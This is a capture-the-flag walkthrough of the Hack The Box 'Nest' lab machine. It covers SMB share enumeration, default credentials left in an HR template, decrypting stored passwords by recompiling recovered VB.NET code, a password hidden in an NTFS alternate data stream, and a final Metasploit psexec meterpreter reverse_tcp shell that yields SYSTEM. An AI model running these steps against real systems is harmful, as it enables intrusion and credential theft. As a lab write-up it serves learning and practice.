HTB Nest Walkthrough
[
HTB_Walkthrough smbclient alternate_data_stream reverse_engineer This is one of my favorite Hack the Box machines, throughout my time completing them! I absolutely enjoyed every minute of this box.
My first NMAP scan, running with multiple flags, failed. I performed a simple nmap scan, and it returned only one port open:
1
2
3
4
5
6
7
8
9
nmap 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:25 CST
Nmap scan report for 10.10.10.178
Host is up (0.043s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 5.41 seconds
In the above, with port 445 open, I then ran a scan against SMB. Server Message Block (also known as Samba) is a way for Windows to share files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.
1
2
3
4
5
6
7
8
9
10
11
12
smbclient -L //10.10.10.178
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
SMB1 disabled -- no workgroup available
The smbclient command showed that there were several network shares. Smbclient is a tool used for Samba, providing a ftp-like experience for users. I went through and connected to each, and found that I was able to login and find possible Usernames in the Users share. I took note of this, as this information is sure to come up later for this box:
1
2
3
4
5
6
7
8
9
10
11
12
13
smbclient \\\\10.10.10.178\\Users
Enter WORKGROUP\root's password:
smb: \> dir
. D 0 Sat Jan 25 17:04:21 2020
.. D 0 Sat Jan 25 17:04:21 2020
Administrator D 0 Fri Aug 9 10:08:23 2019
C.Smith D 0 Sun Jan 26 01:21:44 2020
L.Frost D 0 Thu Aug 8 12:03:01 2019
R.Thompson D 0 Thu Aug 8 12:02:50 2019
TempUser D 0 Wed Aug 7 17:55:56 2019
10485247 blocks of size 4096. 6449754 blocks available
I did attempt to access the user share listed, but access was denied for each of the directories. Continuing my enumeration of the network shares, I connected to Data, and found I could login to the Shared directory:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Aug 7 17:53:46 2019
.. D 0 Wed Aug 7 17:53:46 2019
IT D 0 Wed Aug 7 17:58:07 2019
Production D 0 Mon Aug 5 16:53:38 2019
Reports D 0 Mon Aug 5 16:53:44 2019
Shared D 0 Wed Aug 7 14:07:51 2019
10485247 blocks of size 4096. 6449754 blocks available
smb: \Reports\> cd ..\Shared
smb: \Shared\> dir
. D 0 Wed Aug 7 14:07:51 2019
.. D 0 Wed Aug 7 14:07:51 2019
Maintenance D 0 Wed Aug 7 14:07:32 2019
Templates D 0 Wed Aug 7 14:08:07 2019
10485247 blocks of size 4096. 6449754 blocks available
In this directory, I found a file, Maintenance Alerts.txt. I used the get command to downlaod the file to my local box, and on my Kali Linux viewed the file:
1
2
3
4
5
6
7
8
9
10
11
12
13
smb: \Shared\Maintenance\> dir
. D 0 Wed Aug 7 14:07:32 2019
.. D 0 Wed Aug 7 14:07:32 2019
Maintenance Alerts.txt A 48 Mon Aug 5 18:01:44 2019
10485247 blocks of size 4096. 6449754 blocks available
smb: \Shared\Maintenance\> get "Maintenance Alerts.txt"
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
root@bhax0r:~# cat 'Maintenance Alerts.txt'
There is currently no scheduled maintenance work
However, still nothing! I then went up one directory, and logged into the Templates directory and found another file, Welcome Email.txt. This sounded promising:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
smb: \Shared\Templates\HR\> dir
. D 0 Wed Aug 7 14:08:01 2019
.. D 0 Wed Aug 7 14:08:01 2019
Welcome Email.txt A 425 Wed Aug 7 17:55:36 2019
10485247 blocks of size 4096. 6449754 blocks available
smb: \Shared\Templates\HR\> get "Welcome Email.txt"
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (2.4 KiloBytes/sec) (average 0.9 KiloBytes/sec)
root@hax0r:~# cat 'Welcome Email.txt'
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: welcome2019
Thank you
And I found a possible set of credentials, tempuser:welcome2019! Noting the Users directory earlier, I logged back in with these credentials to that network share:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
smbclient \\\\10.10.10.178\\Users -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> cd TempUser
smb: \TempUser\> dir
. D 0 Wed Aug 7 17:55:56 2019
.. D 0 Wed Aug 7 17:55:56 2019
New Text Document.txt A 0 Wed Aug 7 17:55:56 2019
10485247 blocks of size 4096. 6449754 blocks available
smb: \TempUser\> get "New Text Document.txt"
getting file \TempUser\New Text Document.txt of size 0 as New Text Document.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
root@hax0r:~# cat 'New Text Document.txt'
However, this did not have any further information for me. I then attempted to login to the Users share with the other usernames, using the same password (users don’t always change default passwords) but this approach also did not work. So, I moved on and used these credentials agaisnt other shares. I did find that it allowed me into Secure$:
1
2
3
4
5
6
7
8
9
10
11
12
smbclient \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Aug 7 18:08:12 2019
.. D 0 Wed Aug 7 18:08:12 2019
Finance D 0 Wed Aug 7 14:40:13 2019
HR D 0 Wed Aug 7 18:08:11 2019
IT D 0 Thu Aug 8 05:59:25 2019
10485247 blocks of size 4096. 6449738 blocks available
But, there was nothing within that network share that I could use to my advantage. Moving on, I was able to log into the Data share with the tempuser credentials. I was able to find two interesting files in this share, RU_config.xml and config.xml:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
smb: \IT\Configs\RU Scanner\> ls
. D 0 Wed Aug 7 15:01:13 2019
.. D 0 Wed Aug 7 15:01:13 2019
RU_config.xml A 270 Thu Aug 8 14:49:37 2019
10485247 blocks of size 4096. 6449935 blocks available
smb: \IT\Configs\RU Scanner\> get RU_config.xml
getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as RU_config.xml (1.5 KiloBytes/sec) (average 17.6 KiloBytes/sec)
root@hax0r:~# cat RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
smb: \IT\Configs\NotepadPlusPlus\> ls
. D 0 Wed Aug 7 14:31:37 2019
.. D 0 Wed Aug 7 14:31:37 2019
config.xml A 6451 Wed Aug 7 18:01:25 2019
shortcuts.xml A 2108 Wed Aug 7 14:30:27 2019
10485247 blocks of size 4096. 6449935 blocks available
smb: \IT\Configs\NotepadPlusPlus\> get config.xml
getting file \IT\Configs\NotepadPlusPlus\config.xml of size 6451 as config.xml (37.5 KiloBytes/sec) (average 23.4 KiloBytes/sec)
root@hax0r:~# cat config.xml
...
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
...
Neither of these looked like much at first, but there is relevant and important information. FIrst off, we have a username and password from the RU_config.xml. The second can be easily missed, and this is the second File filename variable in config.xml. I can see that in the network share Secure$, there is a Carl directory within the IT directory. In the RU_config.xml, there is a c.smith password, can this be Carl!?
I logged in and attempted to see if I could get to the Carl directory:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
smbclient \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password: welcome2019
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Aug 7 18:08:12 2019
.. D 0 Wed Aug 7 18:08:12 2019
Finance D 0 Wed Aug 7 14:40:13 2019
HR D 0 Wed Aug 7 18:08:11 2019
IT D 0 Thu Aug 8 05:59:25 2019
10485247 blocks of size 4096. 6449738 blocks available
smb: \> cd IT
smb: \IT\> dir
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \IT\> cd Carl
smb: \IT\Carl\> dir
. D 0 Wed Aug 7 14:42:14 2019
.. D 0 Wed Aug 7 14:42:14 2019
Docs D 0 Wed Aug 7 14:44:00 2019
Reports D 0 Tue Aug 6 08:45:40 2019
VB Projects D 0 Tue Aug 6 09:41:55 2019
And that worked! Note above, that when I was in the Secure$\IT directory, I could not list the contents. However, I could still change into the Carl directory. Awesome! Enumerating these files, I found a RUScanner in VB Projects direcory:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> dir
. D 0 Wed Aug 7 17:05:54 2019
.. D 0 Wed Aug 7 17:05:54 2019
bin D 0 Wed Aug 7 15:00:11 2019
ConfigFile.vb A 772 Wed Aug 7 17:05:09 2019
Module1.vb A 279 Wed Aug 7 17:05:44 2019
My Project D 0 Wed Aug 7 15:00:11 2019
obj D 0 Wed Aug 7 15:00:11 2019
RU Scanner.vbproj A 4828 Fri Aug 9 10:37:51 2019
RU Scanner.vbproj.user A 143 Tue Aug 6 07:55:27 2019
SsoIntegration.vb A 133 Wed Aug 7 17:05:58 2019
Utils.vb A 4888 Wed Aug 7 14:49:35 2019
10485247 blocks of size 4096. 6449951 blocks available'
Looking at the Utils.vb file, there are encrypting and decrypting functions. Looking at how these functions work, there is reference to symmetric key creation, using Rfc2898DeriveBytes. Instead of trying to break this encryption, I took the complete file structure, and copied to a Windows machine. Once I had it locally, I was able to compile the code using Visual Studio.
Once compiled and I attempted to run the file, there was an error message:
1
Unhandled Exception: System.IO.FileNotFoundException: Could not find file 'C:\Users\adalzell\Desktop\Nest\RUScanner\bin\Debug\RU_Config.xml'
Having RU_config.xml file, which contains the hash string that looked like base 64, I placed that file into the directory, and when I ran it, the program ran without any exception errors. I then placed a single line of code to write to console the Plain Text in the Utils.vb decrypt function:
1
2
3
4
5
Public Shared Function Decrypt(ByVal cipherText As String, _
...
Console.WriteLine(plainText)
Return plainText
...
And with that, when I compiled the code again, I could see the plain text password:
1
2
\RUScanner\bin\Debug>DbPof.exe
xRxRxPANCAK3SxRxRx
Now, I am able to connect to the Users share and own user:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
smbclient \\\\10.10.10.178\\Users -U C.Smith
Enter WORKGROUP\C.Smith's password: xRxRxPANCAK3SxRxRx
smb: \> cd C.Smith
smb: \C.Smith\> ls
. D 0 Sun Jan 26 01:21:44 2020
.. D 0 Sun Jan 26 01:21:44 2020
HQK Reporting D 0 Thu Aug 8 18:06:17 2019
user.txt A 32 Thu Aug 8 18:05:24 2019
10485247 blocks of size 4096. 6449757 blocks available
smb: \C.Smith\> get user.txt
getting file \C.Smith\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
root@hax0r:~# cat user.txt
xxxxxxxxxxxxxxx4fd827e05f426e987
Now to move on to own root. I looked in the HQK Reporting directory, and found a password file:
1
2
3
4
5
6
7
8
smb: \C.Smith\HQK Reporting\> ls
. D 0 Thu Aug 8 18:06:17 2019
.. D 0 Thu Aug 8 18:06:17 2019
AD Integration Module D 0 Fri Aug 9 07:18:42 2019
Debug Mode Password.txt A 0 Thu Aug 8 18:08:17 2019
HQK_Config_Backup.xml A 249 Thu Aug 8 18:09:05 2019
10485247 blocks of size 4096. 6449725 blocks available
But, it was empty. That would have been to easy! However, looking at the file attributes, there is a stream associated to it, so I copied of the Alternate Data Stream (ADS) to get the password file:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time: Thu Aug 8 06:06:12 PM 2019 CDT
access_time: Thu Aug 8 06:06:12 PM 2019 CDT
write_time: Thu Aug 8 06:08:17 PM 2019 CDT
change_time: Thu Aug 8 06:08:17 PM 2019 CDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"
root@hax0r:~# cat "/root/Debug Mode Password.txt:Password"
WBQ201953D8w
With this password, I can telnet into the box and enable Debug:
1
2
3
4
5
6
7
8
9
10
telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
Still connected with this telnet session, I enumerated and going up one directory, in the LDAP directory, I found a config file:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: LDAP
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
Using the RU_config.xml I attempted to decrypt returned a padding error. Looking further into the KqdLdap.exe, I found the following code in the CR function:
1
2
3
4
5
6
7
8
' HqkLdap.CR
' Token: 0x06000012 RID: 18 RVA: 0x00002278 File Offset: 0x00000678
Public Shared Function DS(EncryptedString As String) As String
If String.IsNullOrEmpty(EncryptedString) Then
Return String.Empty
End If
Return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
End Function
This is a different set of encryption, different IV, string, and iteration. So, I placed this into the Decryption function of DbPof.exe, and with the administrator hash in the RU_config.xml file, I reran the DbProf.exe program from command prompt, and got the administrator password!
1
2
DbPof.exe
XtH4nkS4Pl4y1nGX
I connected to SMB Share, but there was a shortcut link to the admins desktop. This was no good. So, I used metasploit (after multiple failed attempts with evil-winrm, impacket psexec.py, and winexec) psexec with reverse_tcp payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf5 exploit(windows/smb/psexec) > set LPORT 4538
LPORT => 4538
msf5 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.178
RHOSTS => 10.10.10.178
msf5 exploit(windows/smb/psexec) > set SMBUser
SMBUser =>
msf5 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf5 exploit(windows/smb/psexec) > set SMBPass XtH4nkS4Pl4y1nGX
SMBPass => XtH4nkS4Pl4y1nGX
msf5 exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.13:4538
[*] 10.10.10.178:445 - Connecting to the server...
[*] 10.10.10.178:445 - Authenticating to 10.10.10.178:445 as user 'Administrator'...
[*] 10.10.10.178:445 - Selecting PowerShell target
[*] 10.10.10.178:445 - Executing the payload...
[+] 10.10.10.178:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (180291 bytes) to 10.10.10.178
[*] Meterpreter session 1 opened (10.10.14.13:4538 -> 10.10.10.178:49157) at 2020-01-29 14:28:29 -0600
meterpreter > shell
Process 1456 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\users\administrator\desktop
cd C:\users\administrator\desktop
C:\Users\Administrator\Desktop>more root.txt
more root.txt
xxxxxxxxxxxxxxxxxxx08a42f0b94b878c41
And rooted this box! The name, Nest, really fits this complex set of steps, nesting each step to proceed. Thanks for reading!
[HTB_Walkthrough smbclient alternate_data_stream reverse_engineer